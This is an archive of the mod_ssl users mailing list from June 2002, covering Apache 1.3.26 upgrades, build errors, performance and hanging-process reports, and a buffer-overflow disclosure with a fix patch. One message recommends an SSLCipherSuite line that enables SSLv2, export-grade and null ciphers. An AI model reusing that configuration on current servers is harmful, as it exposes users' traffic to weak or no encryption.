>Could somebody help me create the Apache_1.3.26-Mod_SSL_x-OpenSSL_x file
>from the mod_ssl-2.8.9-1.3.26.tar.gz file that has been released
>recently.
>
>Thanks.
>
>Bye,
>-Jim.
>
>
>On Wed, 19 Jun 2002, Jim Lee wrote:
>
>We have been unable to find the above Apache_1.3.26-Mod_SSL_x file in
>the http://www.modssl.org/contrib/ area.
>
>Nobody's contributed one yet.  I imagine it won't be that far off, it
>usually doesn't take too long.
>
>We also wish to know if the SSL certificate has to be re-created after
>Apache is upgraded to 1.3.26 with the new mod_SSL.
>
>No.
>
>--Cliff
>
>
>
>_________________________________________________________________
>Send and receive Hotmail on your mobile device: http://mobile.msn.com
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 21 22:33:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA18742; Fri, 21 Jun 2002 22:32:25 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from admin01-nyc.clicvu.com id WAA18716; Fri, 21 Jun 2002 22:31:47 +0200 (MET DST)
Received: from [192.168.0.70] by admin01-nyc.clicvu.com
          (Post.Office MTA v3.5.3 release 223 ID# 0-64039U1000L100S0V35)
          with SMTP id com for ;
          Fri, 21 Jun 2002 16:27:43 -0400
Received: by SPIDERMAN with Internet Mail Service (5.5.2653.19)
	id ; Fri, 21 Jun 2002 16:37:04 -0400
Message-ID: <013445F6BB17D4119959005004AAEA9A68393D@SPIDERMAN>
From: Justin Greene 
To: "'modssl-users@modssl.org'" 
Subject: Re: Apache 1.3.26 Upgrade Question - Thanks
Date: Fri, 21 Jun 2002 16:37:04 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Justin Greene 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I just upgraded (win32) from 1.3.20 to 1.3.26 and everything works fine
using the binaries on http://www.mod-ssl.com/contrib/.  Just unzipped
1.3.26, stopped apache, made a copy of the original, copied over the
original, restarted apache.  No problems.

Justin

> -----Original Message-----
> From: Steve Romero [mailto:sromero@smc.sns.slb.com]
> Sent: Friday, June 21, 2002 3:51 PM
> To: modssl-users@modssl.org
> Subject: MODSSL: Re: Apache 1.3.26 Upgrade Question - Thanks
> 
> Jim,
> 
> It would probably be a good idea to back up your old 
> certificate before 
> upgrading.  The certificate is bound to the name of your 
> server or the URL 
> of your website, and not the version of Apache that is 
> running, so you can 
> reuse it.  At least this is true with UNIX.  I'm not a 
> Windows man myself.
> 
> Regards,
> Steve Romero
> 
> At 07:00 PM 6/21/2002 +0000, you wrote:
> 
> >Hi,
> >
> >If i upgrade our current Apache 1.3.20 server with mod_ssl 
> built using:
> >
> >Apache_1.3.20-Mod_SSL_2.8.4-OpenSSL_0.9.6a-WIN32.zip
> >
> >to Apache 1.3.26 server with mod_ssl built using the following file:
> >
> >Apache_1.3.26-Mod_SSL_2.8.9-OpenSSL_0.9.6d-WIN32.zip,
> >
> >would i have to re-create my SSL certificate.
> >
> >My question is in light of the fact that the OpenSSL 
> versions is different 
> >in each of these files.
> >
> >Any feedback on the stability of the new file would be very helpful.
> >
> >Thanks in advance.
> >
> >Bye,
> >-Jim.
> >
> >
> >Sorry Jim
> >
> >You'd have to wait for Monday. I haven't installed perl 
> anymore and the
> >build script require that unfortunatley. First got to install perl on
> >monday in my W2K VMWare.
> >
> >
> >Bye
> >Tim
> >
> >On Thu, 20 Jun 2002 20:12:00 +0000
> >"Jim Lee"  wrote:
> >
> >
> >Thanks a lot Tim.
> >
> >Words cannot express the sense of relief and gratitude that 
> i am feeling
> >
> >right now.
> >
> >I would be eagerly looking tomorrow for the file :
> >Apache_1.3.26-Mod_SSL_2.8.9-OpenSSL_0.9.6d-WIN32.zip
> >at the following location :
> >http://www.modssl.org/contrib/
> >
> >Thanks a million again.
> >
> >Bye,
> >-Jim.
> >
> >
> >Hi Jim
> >
> >On Thu, 20 Jun 2002 17:48:38 +0000
> >"Jim Lee"  wrote:
> >
> >Hi,
> >
> >Please forgive my ignorance.
> >
> >I wish to create a file similar to the following one:
> >Apache_1.3.20-Mod_SSL_2.8.4-OpenSSL_0.9.6a-WIN32.zip,
> >
> >namely,
> >Apache_1.3.26-Mod_SSL_2.8.9-OpenSSL_0.9.6c-WIN32.zip,
> >
> >I need this file so that i can upgrade my current Apache 
> 1.3.20 server
> >with mod_ssl to Apache 1.3.26 server with mod_ssl.
> >
> >I do not have a VC++ 5.0 compiler on my desk and have no idea how i
> >could get the above file from the apache_1.3.26.tar.gz and the
> >mod_ssl-2.8.9-1.3.26.tar.gz and the openssl-0.9.6c.tar.gz files.
> >
> >I've got a VC++ 6.0 compiler at my desk and have already compiled the
> >stuff myself before on W32. I will do this tomorrow, however 
> I will use
> >openssl 0.9.6d ....
> >
> >I'll try to put it in the contrib area.
> >
> >Bye
> >Tim
> >
> >
> >
> >Any help from my friends would be highly appreciated.
> >
> >Thanks.
> >
> >Bye,
> >-Jim.
> >
> >
> >
> >From: "Gilles Gros" 
> >
> >What is really your question ?
> >
> >Just download the source and compile it.
> >
> >apache 1.3.26 : http://www.apache.org/dist/httpd/apache_1.3.26.tar.gz
> >mod SSL 2.8.9-1.3.26 :
> >http://www.modssl.org/source/mod_ssl-2.8.9-1.3.26.tar.gz
> >
> >Gilles
> >
> >Hi,
> >
> >Could somebody help me create the 
> Apache_1.3.26-Mod_SSL_x-OpenSSL_x file
> >from the mod_ssl-2.8.9-1.3.26.tar.gz file that has been released
> >recently.
> >
> >Thanks.
> >
> >Bye,
> >-Jim.
> >
> >
> >On Wed, 19 Jun 2002, Jim Lee wrote:
> >
> >We have been unable to find the above Apache_1.3.26-Mod_SSL_x file in
> >the http://www.modssl.org/contrib/ area.
> >
> >Nobody's contributed one yet.  I imagine it won't be that far off, it
> >usually doesn't take too long.
> >
> >We also wish to know if the SSL certificate has to be 
> re-created after
> >Apache is upgraded to 1.3.26 with the new mod_SSL.
> >
> >No.
> >
> >--Cliff
> >
> >
> >
> >_________________________________________________________________
> >Send and receive Hotmail on your mobile device: http://mobile.msn.com
> >
> >_____________________________________________________________
> _________
> >Apache Interface to OpenSSL (mod_ssl)                   
> www.modssl.org
> >User Support Mailing List                      
> modssl-users@modssl.org
> >Automated List Manager                            
> majordomo@modssl.org
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jun 22 11:13:06 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA10434; Sat, 22 Jun 2002 11:12:18 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from angel.sabetonline.com id LAA10408; Sat, 22 Jun 2002 11:11:54 +0200 (MET DST)
Received: (qmail 7290 invoked by uid 1001); 22 Jun 2002 10:11:57 -0000
Received: from unknown (HELO gateway) (192.168.3.114)
  by 192.168.3.7 with SMTP; 22 Jun 2002 10:11:57 -0000
Date: Sat, 22 Jun 2002 10:11:50 +0100
From: Louis Sabet 
To: modssl-users@modssl.org
Subject: Re: 56-bit/128-bit IE problems
In-Reply-To: <3D137F71.7070301@itaction.co.uk>
References: <20020621184121.A1035846@ohm.arago.de> <3D137F71.7070301@itaction.co.uk>
Message-Id: <20020622100434.EE99.LOUIS@webtedium.com>
MIME-Version: 1.0
Content-Type: text/plain; charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Mailer: Becky! ver. 2.00.08
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Louis Sabet 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Right,

Problem solved. I took the suggestion, and read the FAQ. Adding:

SSLCipherSuite
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL

To my VirtualHosts appears to fix the problem (now I can delete about
10Gig's worth of VMWare VM's)

As it happens, yes, we do have Secure Site Pro from Verisign, although
as every day passes, I wish we had stuck with Thawte. For some reason we
never had problems like this until now (which is why I never really
bothered investigating mod_ssl too much). Of-course Verisign couldn't
care less.

I really should publish a book containing a full account of my dealings
with verisign. It would be a comedy hit.

Anyway, in conclusion, thanks everyone who replied - I got this sorted
out faster than I thought I would thanks to you guys.

Regards,

L

On Fri, 21 Jun 2002 20:33:05 +0100
"Peter Viertel"  wrote:

> The problem here as usual is that he HAS got a SGC certificate - and 
> some ie's barf unless you drop EXPORT56 from your offering when you have 
> one of those certs.
> 
> not worth the money as far as I'm concerned, not even when getting 
> thawte's one. I feel its a scam the way they sell SGC's as some sort of 
> premium security prouct when all they're doing is enabling functionality 
> the browser already has. These were designed for another purpose 
> altogether before the USA relaxed its crypto export rules a few years ago.
> 
> Thomas Binder wrote:
> 
> >Hi!
> >
> >On Fri, Jun 21, 2002 at 08:39:04AM -0700, David Wall wrote:
> >  
> >
> >>You could also consider getting a Thawte "super cert" which has
> >>a capability to allow the 56-bit export version of IE to not be
> >>so stupid and connect at the higher 128-bit when accessing your
> >>site.
> >>    
> >>
> >
> >Just for the record, Thawte's "Super Certs" are what VeriSign
> >calls "Secure Site Server Pro (Global) ID". But they are quite a
> >lot cheaper.
> >
> >
> >Ciao
> >
> >Thomas
> >______________________________________________________________________
> >Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> >User Support Mailing List                      modssl-users@modssl.org
> >Automated List Manager                            majordomo@modssl.org
> >  
> >
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

-- 
Louis Sabet 
http://www.webtedium.com/


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jun 22 12:12:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA13941; Sat, 22 Jun 2002 12:11:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id MAA13895; Sat, 22 Jun 2002 12:10:20 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 958554CE793; Sat, 22 Jun 2002 12:10:19 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 5ECC728830; Sat, 22 Jun 2002 09:52:06 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id EAA19470; Sat, 22 Jun 2002 04:54:32 +0200 (MET DST)
Received: from localhost (dufresne@localhost)
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id WAA10834;
	Fri, 21 Jun 2002 22:12:07 -0400
Date: Fri, 21 Jun 2002 22:12:07 -0400 (EDT)
From: "R. DuFresne" 
To: modssl-users@modssl.org
Cc: openssl-bugs@openssl.org
Subject: openssl shared:
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


uname -a
Linux darkstar 2.0.35 #4 Mon Dec 14 18:18:57 CST 1998 i586 unknown


config shared no-threads
make
make test

works fine for openssl-engine-0.9.6b/

works fine for openssl-0.9.7-beta2/

Fails miserably for openssl-engine-0.9.6d/

Thanks,


Ron DuFresne
-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jun 22 12:12:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA13947; Sat, 22 Jun 2002 12:11:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id MAA13896; Sat, 22 Jun 2002 12:10:20 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id A52A84CE799; Sat, 22 Jun 2002 12:10:19 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 5CBE228844; Sat, 22 Jun 2002 09:51:13 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from pascal.arago.de id AAA27118; Sat, 22 Jun 2002 00:48:13 +0200 (MET DST)
Received: Received: (from uucp@localhost)
	by pascal.arago.de id g5LMmCl13631470
	for modssl-users@modssl.org; Sat, 22 Jun 2002 00:48:12 +0200 (METDST)
Received: from UNKNOWN(194.153.130.2), claiming to be "carat.arago.de"
 via SMTP by pascal.arago.de, id smtpdAAAa0o0JH; Sat Jun 22 00:48:07 2002
Received: from ohm.arago.de (localhost [127.0.0.1])
	by carat.arago.de (8.9.3/8.9.3) with SMTP id AAA02264
	for ; Sat, 22 Jun 2002 00:47:13 +0200 (MET DST)
Received: (from gryf@localhost)
	by ohm.arago.de (SGI-8.9.3/8.9.3) id AAA74307
	for modssl-users@modssl.org; Sat, 22 Jun 2002 00:48:06 +0200 (METDST)
Date: Sat, 22 Jun 2002 00:48:05 +0200
From: Thomas Binder 
To: modssl-users@modssl.org
Subject: Re: 56-bit/128-bit IE problems
Message-ID: <20020622004805.A1229982@ohm.arago.de>
Mail-Followup-To: modssl-users@modssl.org
References: <20020621184121.A1035846@ohm.arago.de> 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: ; from dufresne@sysinfo.com on Fri, Jun 21, 2002 at 03:29:53PM -0400
Organization: arago GmbH
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Thomas Binder 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi!

On Fri, Jun 21, 2002 at 03:29:53PM -0400, R. DuFresne wrote:
> Are there still export restriction on the 128bit browsers?  I
> was under the impression those export restrictions had been
> lifted a few years back.

Of course most do, but at least here in Germany a lot of banks
still use Netscape 4.0x with OS/2. For their users, you still need
such special certs, as the banks are also unwilling to use a patch
like Fortify which comes from an "untrusted source".


Ciao

Thomas
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jun 22 12:12:17 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id MAA13950; Sat, 22 Jun 2002 12:11:22 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id MAA13897; Sat, 22 Jun 2002 12:10:20 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id B4EA14CE79B; Sat, 22 Jun 2002 12:10:19 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id EE8F0286B6; Sat, 22 Jun 2002 09:52:01 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from localhost id BAA00234; Sat, 22 Jun 2002 01:49:12 +0200 (MET DST)
Date: Sat, 22 Jun 2002 01:49:12 +0200 (MET DST)
Message-Id: <200206212349.BAA00234@opensource.ee.ethz.ch>
From: modssl-bugdb@modssl.org
To: modssl-users@modssl.org
Subject: [BugDB] Performance issue (PR#723)
Cc: modssl-bugdb@modssl.org
X-Loop: modssl-bugdb@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl-bugdb@modssl.org
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Full_Name: Denis Almeida Vieira Junior
Version: 2.8.9
OS: Solaris 2.7
Submission from: (NULL) (200.221.27.122)


Hey there.

I've been detecting some performance problems, since the version 2.8.6.
Today, I'm testing with Apache 1.3.26 + mod_ssl 2.8.9 and openssl 0.9.6d.

The configuration "Apache 1.3.22 + mod_ssl 2.8.5 + openssl 0.9.6b" and lower,
works fine.

So, here is the problem:

Case 1) - "Apache 1.3.22 + mod_ssl 2.8.5 + openssl 0.9.6b".
"Working fine, but apache vulnerable (chunk vuln) and (zlib problems).

configuration: export CFLAGS='-DHARD_SERVER_LIMIT=8192'; ./configure
--with-apache=../apache_1.3.22
--with-ssl=../../openssl-0.9.6b  --disable-rule=DEV_RANDOM --disable-rule=EXPAT
--disable-rule=IRIXN32 --disable-rule=IRIXNIS --disable-rule=WANTHSREGEX
--enable-module=most --enable-module=mmap_static --enable-shared=ssl
--enable-shared=max
--prefix=/opt/apache1322

This case works fine. I stressed the server, with 150 threads, and the loadav
was considerably
(~4).

Case 2) - "Apache 1.3.26 + mod_ssl 2.8.9 + openssl 0.9.6d".
The perfect situation. No chunk exploit or zlib problems.

configuration: export CFLAGS='-DHARD_SERVER_LIMIT=8192'; ./configure
--with-apache=../apache_1.3.26
--with-ssl=../../openssl-0.9.6d  --disable-rule=DEV_RANDOM --disable-rule=EXPAT
--disable-rule=IRIXN32 --disable-rule=IRIXNIS --disable-rule=WANTHSREGEX
--enable-module=most --enable-module=mmap_static --enable-shared=ssl
--enable-shared=max
--prefix=/opt/apache1326

This case unveils the performance issue. And the same happens with any version
newer than the
case 1. The same stress situation, under this condition, same config httpd.conf
file, the server
works on a ~40 loadav.

In this case 2, I opened a new test, under the same conditions, but the
compilation of the
OpenSSL. I tried the "./config no-threads no-idea -fPIC" configuration and
compilation options.
This caused a different behavior. I mean, it took a little while (~3 minutes),
to the loadav get
high, and after a few minutes, it got worse... the loadav reached ~60...
Without the "no-threads no-idea -fPIC" options at the openSSL compilation, the
high loadav is
instantaneous.

I can bring any information you need to debug this problem. Just let me know
what do you need.
I really need a help here. I have problems upgrading my servers because the
performance issue,
and I need to, to fix the chunk and zlib problems.

Any help would be gladly appreciated.

B. Regards.

Denis.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Jun 22 19:06:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA25164; Sat, 22 Jun 2002 19:05:07 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id TAA25153; Sat, 22 Jun 2002 19:05:01 +0200 (MET DST)
Received: from localhost (dufresne@localhost)
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id NAA07733
	for ; Sat, 22 Jun 2002 13:05:54 -0400
Date: Sat, 22 Jun 2002 13:05:54 -0400 (EDT)
From: "R. DuFresne" 
To: modssl-users@modssl.org
Subject: apache 2.0 hates older linux kernels:
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


uname -a
Linux darkstar 2.0.35 #4 Mon Dec 14 18:18:57 CST 1998 i586 unknown


and no matter how we configure, apache dies under:

/bin/sh /mnt/src/httpd-2.0.39/srclib/apr/libtool --silent --mode=compile
gcc  -g -O2    -DLINUX=2 -D_REENTRANT -DAP_HAVE_DESIGNATED_INITIALIZER
-I/mnt/src/httpd-2.0.39/srclib/apr/include
-I/mnt/src/httpd-2.0.39/srclib/apr-util/include
-I/mnt/src/httpd-2.0.39/srclib/apr-util/xml/expat/lib -I.
-I/mnt/src/httpd-2.0.39/os/unix -I/mnt/src/httpd-2.0.39/server/mpm/prefork
-I/mnt/src/httpd-2.0.39/modules/http
-I/mnt/src/httpd-2.0.39/modules/filters
-I/mnt/src/httpd-2.0.39/modules/proxy -I/mnt/src/httpd-2.0.39/include
-I/mnt/src/httpd-2.0.39/modules/dav/main -prefer-non-pic -static -c
mod_status.c && touch mod_status.lo
mod_status.c: In function `status_handler':
mod_status.c:270: `HZ' undeclared (first use this function)
mod_status.c:270: (Each undeclared identifier is reported only once
mod_status.c:270: for each function it appears in.)
make[3]: *** [mod_status.lo] Error 1
make[3]: Leaving directory `/mnt/src/httpd-2.0.39/modules/generators'
make[2]: *** [all-recursive] Error 1
make[2]: Leaving directory `/mnt/src/httpd-2.0.39/modules/generators'
make[1]: *** [all-recursive] Error 1
make[1]: Leaving directory `/mnt/src/httpd-2.0.39/modules'
make: *** [all-recursive] Error 1



Thanks,

Ron DuFresne
-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Jun 23 11:04:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA24353; Sun, 23 Jun 2002 11:03:11 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id LAA24333; Sun, 23 Jun 2002 11:02:38 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id C2C3A4CE782; Sun, 23 Jun 2002 11:02:34 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 2EBEB286BA; Sun, 23 Jun 2002 11:02:02 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from localhost id KAA22191; Sun, 23 Jun 2002 10:07:03 +0200 (MET DST)
Date: Sun, 23 Jun 2002 10:07:03 +0200 (MET DST)
Message-Id: <200206230807.KAA22191@opensource.ee.ethz.ch>
From: modssl-bugdb@modssl.org
To: modssl-users@modssl.org
Subject: [BugDB] Buffer overflow in mod_ssl (patch enclosed) (PR#724)
Cc: modssl-bugdb@modssl.org
X-Loop: modssl-bugdb@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl-bugdb@modssl.org
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Full_Name: Frank Denis - Jedi/Sector One
Version: 2.8.8 (OpenBSD-current)
OS: OpenBSD
Submission from: (NULL) (212.198.0.93)


There's an easy to exploit (through .htaccess files) buffer overflow in mod_ssl.
The EAPI's rewrite parser hook skips spaces without checking whether the pointer
went past the end of the buffer.

Fix follows :

--- src/modules/ssl/ssl_engine_compat.c.orig    Thu Mar 29 12:21:24 2001
+++ src/modules/ssl/ssl_engine_compat.c Sun Jun 23 09:39:54 2002
@@ -300,16 +300,16 @@
      * Skip comment lines
      */
     cp = (char *)oline;
-    while ((*cp == ' ' || *cp == '\t' || *cp == '\n') && (*cp != NUL))
+    for (i = 0; (*cp == ' ' || *cp == '\t' || *cp == '\n') && (*cp != NUL) &&
++
i < sizeof(caCmd); )
         cp++;
-    if (*cp == '#' || *cp == NUL)
+    if (*cp == '#' || *cp == NUL || i >= sizeof(caCmd))
         return NULL;

     /*
      * Extract directive name
      */
     cp = (char *)oline;
-    for (i = 0; *cp != ' ' && *cp != '\t' && *cp != NUL && i < 1024; )
+    for (i = 0; *cp != ' ' && *cp != '\t' && *cp != NUL && i < sizeof(caCmd) -
1
; )
         caCmd[i++] = *cp++;
     caCmd[i] = NUL;
     cpArgs = cp;

Cut/pasting patches in HTML forms often give bad results, so for convenience you
can also fetch the trivial patch from here :

http://www.42-networks.com/ssl_parse_overflow.patch

Best regards,

   -Jedi.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 24 08:26:35 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA26638; Mon, 24 Jun 2002 08:25:56 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail3.aracnet.com id IAA26489; Mon, 24 Jun 2002 08:24:49 +0200 (MET DST)
Received: from shell1.aracnet.com (shell1.aracnet.com [216.99.193.21])
	by mail3.aracnet.com (8.12.3/8.12.1) with ESMTP id g5O6OlYl015809
	for ; Sun, 23 Jun 2002 23:24:47 -0700
Received: by shell1.aracnet.com (8.11.6)  id g5O6OoG31768; Sun, 23 Jun 2002 23:24:50 -0700
Date: Sun, 23 Jun 2002 23:24:50 -0700 (PDT)
From: Alex Kotov 
To: 
Subject: hanging apache processes (1.3.29 + mod_ssl 2.8.9)
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Alex Kotov 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


We have a strange problem with our Apache+mod_ssl server
(Apache/1.3.26 (Unix) mod_perl/1.22 mod_ssl/2.8.9 OpenSSL/0.9.6,
on Linux 2.2.19).
After a while the server processes become stuck while waiting for
the data from a socket. The timeout is set to 300 in httpd.conf,
but the processes happily wait for data for about an hour before
timing out. If the load on the server is high enough, all process
slots eventually get populated and the server stops serving.

The interesting aspect is, most of the time processes get stuck
when the request comes from one particular IP, and they don't get
stuck on every request from that IP. DoS attack is very unlikely,
judging by the activity.

Did anybody see this before? Is there a fix or a workaround? Strace and
cipher_log results are below.

Thanks in advance,

- Alex
wslab@aracnet.com



Running strace on a hung process produces

read(5,

for a long time, eventually followed by

read(5, 0x959d2d8, 11) = -1 ETIMEDOUT (Connection timed out)

The connection takes about 3600 seconds to time out.

cipher_log contains this for a "normal" connection (dumps removed):

[23/Jun/2002 17:02:01 08719] [info]  Connection to child 4 established
(server xxx.xx
:443, client xxx.xxx.xxx.xxx)
[23/Jun/2002 17:02:01 08719] [info]  Seeding PRNG with 23177 bytes of
entropy
[23/Jun/2002 17:02:01 08719] [trace] OpenSSL: Handshake: start
[23/Jun/2002 17:02:01 08719] [trace] OpenSSL: Loop: before/accept
initialization
[23/Jun/2002 17:02:01 08719] [debug] OpenSSL: read 11/11 bytes from
BIO#09327750
 [mem: 092E2FD8] (BIO dump follows)
[23/Jun/2002 17:02:01 08719] [debug] OpenSSL: read 91/91 bytes from
BIO#09327750
 [mem: 092E2FE3] (BIO dump follows)
[23/Jun/2002 17:02:01 08719] [trace] OpenSSL: Loop: SSLv3 read client
hello A
[23/Jun/2002 17:02:01 08719] [trace] OpenSSL: Loop: SSLv3 write server
hello A
[23/Jun/2002 17:02:01 08719] [trace] OpenSSL: Loop: SSLv3 write change
cipher sp
ec A

etc.

For a stuck connection, cipher_log contains

[23/Jun/2002 17:02:04 08719] [info]  Connection to child 4 established
(server xxx.xxx
:443, client xxx.xxx.xxx.xxx)
[23/Jun/2002 17:02:04 08719] [info]  Seeding PRNG with 23177 bytes of
entropy
[23/Jun/2002 17:02:04 08719] [trace] OpenSSL: Handshake: start
[23/Jun/2002 17:02:04 08719] [trace] OpenSSL: Loop: before/accept
initialization

with nothing else for this PID for a long time.

It seems that the process is trying to start an SSL connection, but times
out on read and does not respect Timeout settings in the configuration
file.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 24 08:33:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id IAA27116; Mon, 24 Jun 2002 08:32:37 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from deepthought.cs.virginia.edu id IAA27035; Mon, 24 Jun 2002 08:31:13 +0200 (MET DST)
Received: from localhost (root@localhost)
	by deepthought.cs.virginia.edu (8.11.6/8.11.4) with ESMTP id g5O6R8w12135;
	Mon, 24 Jun 2002 02:27:08 -0400
